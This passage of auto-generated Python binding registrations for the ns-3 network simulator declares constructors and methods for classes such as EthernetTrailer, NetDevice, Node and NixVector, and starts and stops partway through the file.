[param('uint64_t', 'preambleSfd')])
## ethernet-header.h (module 'network'): void ns3::EthernetHeader::SetSource(ns3::Mac48Address source) [member function]
cls.add_method('SetSource',
'void',
[param('ns3::Mac48Address', 'source')])
return
def register_Ns3EthernetTrailer_methods(root_module, cls):
## ethernet-trailer.h (module 'network'): ns3::EthernetTrailer::EthernetTrailer(ns3::EthernetTrailer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EthernetTrailer const &', 'arg0')])
## ethernet-trailer.h (module 'network'): ns3::EthernetTrailer::EthernetTrailer() [constructor]
cls.add_constructor([])
## ethernet-trailer.h (module 'network'): void ns3::EthernetTrailer::CalcFcs(ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('CalcFcs',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'p')])
## ethernet-trailer.h (module 'network'): bool ns3::EthernetTrailer::CheckFcs(ns3::Ptr<const ns3::Packet> p) const [member function]
cls.add_method('CheckFcs',
'bool',
[param('ns3::Ptr< ns3::Packet const >', 'p')],
is_const=True)
## ethernet-trailer.h (module 'network'): uint32_t ns3::EthernetTrailer::Deserialize(ns3::Buffer::Iterator end) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'end')],
is_virtual=True)
## ethernet-trailer.h (module 'network'): void ns3::EthernetTrailer::EnableFcs(bool enable) [member function]
cls.add_method('EnableFcs',
'void',
[param('bool', 'enable')])
## ethernet-trailer.h (module 'network'): uint32_t ns3::EthernetTrailer::GetFcs() [member function]
cls.add_method('GetFcs',
'uint32_t',
[])
## ethernet-trailer.h (module 'network'): ns3::TypeId ns3::EthernetTrailer::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## ethernet-trailer.h (module 'network'): uint32_t ns3::EthernetTrailer::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## ethernet-trailer.h (module 'network'): uint32_t ns3::EthernetTrailer::GetTrailerSize() const [member function]
cls.add_method('GetTrailerSize',
'uint32_t',
[],
is_const=True)
## ethernet-trailer.h (module 'network'): static ns3::TypeId ns3::EthernetTrailer::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## ethernet-trailer.h (module 'network'): void ns3::EthernetTrailer::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## ethernet-trailer.h (module 'network'): void ns3::EthernetTrailer::Serialize(ns3::Buffer::Iterator end) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'end')],
is_const=True, is_virtual=True)
## ethernet-trailer.h (module 'network'): void ns3::EthernetTrailer::SetFcs(uint32_t fcs) [member function]
cls.add_method('SetFcs',
'void',
[param('uint32_t', 'fcs')])
return
def register_Ns3EventImpl_methods(root_module, cls):
## event-impl.h (module 'core'): ns3::EventImpl::EventImpl(ns3::EventImpl const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EventImpl const &', 'arg0')])
## event-impl.h (module 'core'): ns3::EventImpl::EventImpl() [constructor]
cls.add_constructor([])
## event-impl.h (module 'core'): void ns3::EventImpl::Cancel() [member function]
cls.add_method('Cancel',
'void',
[])
## event-impl.h (module 'core'): void ns3::EventImpl::Invoke() [member function]
cls.add_method('Invoke',
'void',
[])
## event-impl.h (module 'core'): bool ns3::EventImpl::IsCancelled() [member function]
cls.add_method('IsCancelled',
'bool',
[])
## event-impl.h (module 'core'): void ns3::EventImpl::Notify() [member function]
cls.add_method('Notify',
'void',
[],
is_pure_virtual=True, visibility='protected', is_virtual=True)
return
def register_Ns3Ipv4AddressChecker_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker(ns3::Ipv4AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4AddressChecker const &', 'arg0')])
return
def register_Ns3Ipv4AddressValue_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4AddressValue const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4Address const & value) [constructor]
cls.add_constructor([param('ns3::Ipv4Address const &', 'value')])
## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-address.h (module 'network'): std::string ns3::Ipv4AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4AddressValue::Set(ns3::Ipv4Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv4Address const &', 'value')])
return
def register_Ns3Ipv4MaskChecker_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker(ns3::Ipv4MaskChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4MaskChecker const &', 'arg0')])
return
def register_Ns3Ipv4MaskValue_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4MaskValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4MaskValue const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4Mask const & value) [constructor]
cls.add_constructor([param('ns3::Ipv4Mask const &', 'value')])
## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4MaskValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4MaskValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv4-address.h (module 'network'): ns3::Ipv4Mask ns3::Ipv4MaskValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv4Mask',
[],
is_const=True)
## ipv4-address.h (module 'network'): std::string ns3::Ipv4MaskValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4MaskValue::Set(ns3::Ipv4Mask const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv4Mask const &', 'value')])
return
def register_Ns3Ipv6AddressChecker_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker(ns3::Ipv6AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6AddressChecker const &', 'arg0')])
return
def register_Ns3Ipv6AddressValue_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6AddressValue const &', 'arg0')])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6Address const & value) [constructor]
cls.add_constructor([param('ns3::Ipv6Address const &', 'value')])
## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv6Address',
[],
is_const=True)
## ipv6-address.h (module 'network'): std::string ns3::Ipv6AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6AddressValue::Set(ns3::Ipv6Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv6Address const &', 'value')])
return
def register_Ns3Ipv6PrefixChecker_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker(ns3::Ipv6PrefixChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6PrefixChecker const &', 'arg0')])
return
def register_Ns3Ipv6PrefixValue_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6PrefixValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6PrefixValue const &', 'arg0')])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6Prefix const & value) [constructor]
cls.add_constructor([param('ns3::Ipv6Prefix const &', 'value')])
## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6PrefixValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6PrefixValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix ns3::Ipv6PrefixValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv6Prefix',
[],
is_const=True)
## ipv6-address.h (module 'network'): std::string ns3::Ipv6PrefixValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6PrefixValue::Set(ns3::Ipv6Prefix const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv6Prefix const &', 'value')])
return
def register_Ns3ListErrorModel_methods(root_module, cls):
## error-model.h (module 'network'): ns3::ListErrorModel::ListErrorModel(ns3::ListErrorModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ListErrorModel const &', 'arg0')])
## error-model.h (module 'network'): ns3::ListErrorModel::ListErrorModel() [constructor]
cls.add_constructor([])
## error-model.h (module 'network'): std::list<unsigned int, std::allocator<unsigned int> > ns3::ListErrorModel::GetList() const [member function]
cls.add_method('GetList',
'std::list< unsigned int >',
[],
is_const=True)
## error-model.h (module 'network'): static ns3::TypeId ns3::ListErrorModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## error-model.h (module 'network'): void ns3::ListErrorModel::SetList(std::list<unsigned int, std::allocator<unsigned int> > const & packetlist) [member function]
cls.add_method('SetList',
'void',
[param('std::list< unsigned int > const &', 'packetlist')])
## error-model.h (module 'network'): bool ns3::ListErrorModel::DoCorrupt(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('DoCorrupt',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')],
visibility='private', is_virtual=True)
## error-model.h (module 'network'): void ns3::ListErrorModel::DoReset() [member function]
cls.add_method('DoReset',
'void',
[],
visibility='private', is_virtual=True)
return
def register_Ns3Mac48AddressChecker_methods(root_module, cls):
## mac48-address.h (module 'network'): ns3::Mac48AddressChecker::Mac48AddressChecker() [constructor]
cls.add_constructor([])
## mac48-address.h (module 'network'): ns3::Mac48AddressChecker::Mac48AddressChecker(ns3::Mac48AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Mac48AddressChecker const &', 'arg0')])
return
def register_Ns3Mac48AddressValue_methods(root_module, cls):
## mac48-address.h (module 'network'): ns3::Mac48AddressValue::Mac48AddressValue() [constructor]
cls.add_constructor([])
## mac48-address.h (module 'network'): ns3::Mac48AddressValue::Mac48AddressValue(ns3::Mac48AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Mac48AddressValue const &', 'arg0')])
## mac48-address.h (module 'network'): ns3::Mac48AddressValue::Mac48AddressValue(ns3::Mac48Address const & value) [constructor]
cls.add_constructor([param('ns3::Mac48Address const &', 'value')])
## mac48-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Mac48AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## mac48-address.h (module 'network'): bool ns3::Mac48AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## mac48-address.h (module 'network'): ns3::Mac48Address ns3::Mac48AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Mac48Address',
[],
is_const=True)
## mac48-address.h (module 'network'): std::string ns3::Mac48AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## mac48-address.h (module 'network'): void ns3::Mac48AddressValue::Set(ns3::Mac48Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Mac48Address const &', 'value')])
return
def register_Ns3NetDevice_methods(root_module, cls):
## net-device.h (module 'network'): ns3::NetDevice::NetDevice() [constructor]
cls.add_constructor([])
## net-device.h (module 'network'): ns3::NetDevice::NetDevice(ns3::NetDevice const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NetDevice const &', 'arg0')])
## net-device.h (module 'network'): void ns3::NetDevice::AddLinkChangeCallback(ns3::Callback<void,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> callback) [member function]
cls.add_method('AddLinkChangeCallback',
'void',
[param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetAddress() const [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Ptr<ns3::Channel> ns3::NetDevice::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::Channel >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): uint32_t ns3::NetDevice::GetIfIndex() const [member function]
cls.add_method('GetIfIndex',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): uint16_t ns3::NetDevice::GetMtu() const [member function]
cls.add_method('GetMtu',
'uint16_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv4Address multicastGroup) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv4Address', 'multicastGroup')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv6Address addr) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv6Address', 'addr')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NetDevice::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): static ns3::TypeId ns3::NetDevice::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsBridge() const [member function]
cls.add_method('IsBridge',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsBroadcast() const [member function]
cls.add_method('IsBroadcast',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsLinkUp() const [member function]
cls.add_method('IsLinkUp',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsPointToPoint() const [member function]
cls.add_method('IsPointToPoint',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::NeedsArp() const [member function]
cls.add_method('NeedsArp',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::Send(ns3::Ptr<ns3::Packet> packet, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Send',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::SendFrom(ns3::Ptr<ns3::Packet> packet, ns3::Address const & source, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('SendFrom',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'source'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetAddress(ns3::Address address) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::Address', 'address')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetIfIndex(uint32_t const index) [member function]
cls.add_method('SetIfIndex',
'void',
[param('uint32_t const', 'index')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::SetMtu(uint16_t const mtu) [member function]
cls.add_method('SetMtu',
'bool',
[param('uint16_t const', 'mtu')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetPromiscReceiveCallback(ns3::Callback<bool, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetPromiscReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetReceiveCallback(ns3::Callback<bool, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::SupportsSendFrom() const [member function]
cls.add_method('SupportsSendFrom',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3NixVector_methods(root_module, cls):
cls.add_output_stream_operator()
## nix-vector.h (module 'network'): ns3::NixVector::NixVector() [constructor]
cls.add_constructor([])
## nix-vector.h (module 'network'): ns3::NixVector::NixVector(ns3::NixVector const & o) [copy constructor]
cls.add_constructor([param('ns3::NixVector const &', 'o')])
## nix-vector.h (module 'network'): void ns3::NixVector::AddNeighborIndex(uint32_t newBits, uint32_t numberOfBits) [member function]
cls.add_method('AddNeighborIndex',
'void',
[param('uint32_t', 'newBits'), param('uint32_t', 'numberOfBits')])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::BitCount(uint32_t numberOfNeighbors) const [member function]
cls.add_method('BitCount',
'uint32_t',
[param('uint32_t', 'numberOfNeighbors')],
is_const=True)
## nix-vector.h (module 'network'): ns3::Ptr<ns3::NixVector> ns3::NixVector::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::NixVector >',
[],
is_const=True)
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::Deserialize(uint32_t const * buffer, uint32_t size) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('uint32_t const *', 'buffer'), param('uint32_t', 'size')])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::ExtractNeighborIndex(uint32_t numberOfBits) [member function]
cls.add_method('ExtractNeighborIndex',
'uint32_t',
[param('uint32_t', 'numberOfBits')])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::GetRemainingBits() [member function]
cls.add_method('GetRemainingBits',
'uint32_t',
[])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::Serialize(uint32_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint32_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
return
def register_Ns3Node_methods(root_module, cls):
## node.h (module 'network'): ns3::Node::Node(ns3::Node const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Node const &', 'arg0')])
## node.h (module 'network'): ns3::Node::Node() [constructor]
cls.add_constructor([])
## node.h (module 'network'): ns3::Node::Node(uint32_t systemId) [constructor]
cls.add_constructor([param('uint32_t', 'systemId')])
## node.h (module 'network'): uint32_t ns3::Node::AddApplication(ns3::Ptr<ns3::Application> application) [member function]
cls.add_method('AddApplication',
'uint32_t',
[param('ns3::Ptr< ns3::Application >', 'application')])
## node.h (module 'network'): uint32_t ns3::Node::AddDevice(ns3::Ptr<ns3::NetDevice> device) [member function]
cls.add_method('AddDevice',
'uint32_t',
[param('ns3::Ptr< ns3::NetDevice >', 'device')])
## node.h (module 'network'): static bool ns3::Node::ChecksumEnabled() [member function]
cls.add_method('ChecksumEnabled',
'bool',
[],
is_static=True)
## node.h (module 'network'): ns3::Ptr<ns3::Application> ns3::Node::GetApplication(uint32_t index) const [member function]
cls.add_method('GetApplication',
'ns3::Ptr< ns3::Application >',
[param('uint32_t', 'index')],
is_const=True)
## node.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Node::GetDevice(uint32_t index) const [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'index')],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetId() const [member function]
cls.add_method('GetId',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetNApplications() const [member function]
cls.add_method('GetNApplications',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetNDevices() const [member function]
cls.add_method('GetNDevices',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetSystemId() const [member function]
cls.add_method('GetSystemId',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): static ns3::TypeId ns3::Node::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## node.h (module 'network'): void ns3::Node::RegisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function]
cls.add_method('RegisterDeviceAdditionListener',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')])
## node.h (module 'network'): void ns3::Node::RegisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler, uint16_t protocolType, ns3::Ptr<ns3::NetDevice> device, bool promiscuous=false) [member function]
cls.add_method('RegisterProtocolHandler',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler'), param('uint16_t', 'protocolType'), param('ns3::Ptr< ns3::NetDevice >', 'device'), param('bool', 'promiscuous', default_value='false')])
## node.h (module 'network'): void ns3::Node::UnregisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function]
cls.add_method('UnregisterDeviceAdditionListener',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')])
## node.h (module 'network'): void ns3::Node::UnregisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler) [member function]
cls.add_method('UnregisterProtocolHandler',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler')])
## node.h (module 'network'): void ns3::Node::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## node.h (module 'network'): void ns3::Node::DoStart() [member function]
cls.add_method('DoStart',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3ObjectFactoryChecker_methods(root_module, cls):
## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker() [constructor]
cls.add_constructor([])
## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker(ns3::ObjectFactoryChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectFactoryChecker const &', 'arg0')])
return
def register_Ns3ObjectFactoryValue_methods(root_module, cls):
## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue() [constructor]
cls.add_constructor([])
## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactoryValue const & arg0) [copy constructor]
